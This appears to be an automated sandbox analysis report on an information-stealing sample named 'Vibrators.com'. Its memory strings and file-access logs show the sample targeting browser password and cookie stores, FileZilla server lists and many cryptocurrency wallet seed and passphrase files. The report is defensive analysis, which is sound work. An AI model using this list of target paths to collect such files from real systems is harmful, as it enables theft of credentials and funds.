Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: mLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: mLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: mLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: mLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: mLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: mLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: mLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: mLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: Vibrators.com, 0000000B.00000002.2507233828.0000000003B5C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: mLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\crashes\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\db\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ca4gppea.default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\security_state\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\to-be-removed\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\bookmarkbackups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\tmp\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\temporary\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\minidumps\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\crashes\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Vibrators.com	Binary or memory string: WIN_81
Source: Vibrators.com	Binary or memory string: WIN_XP
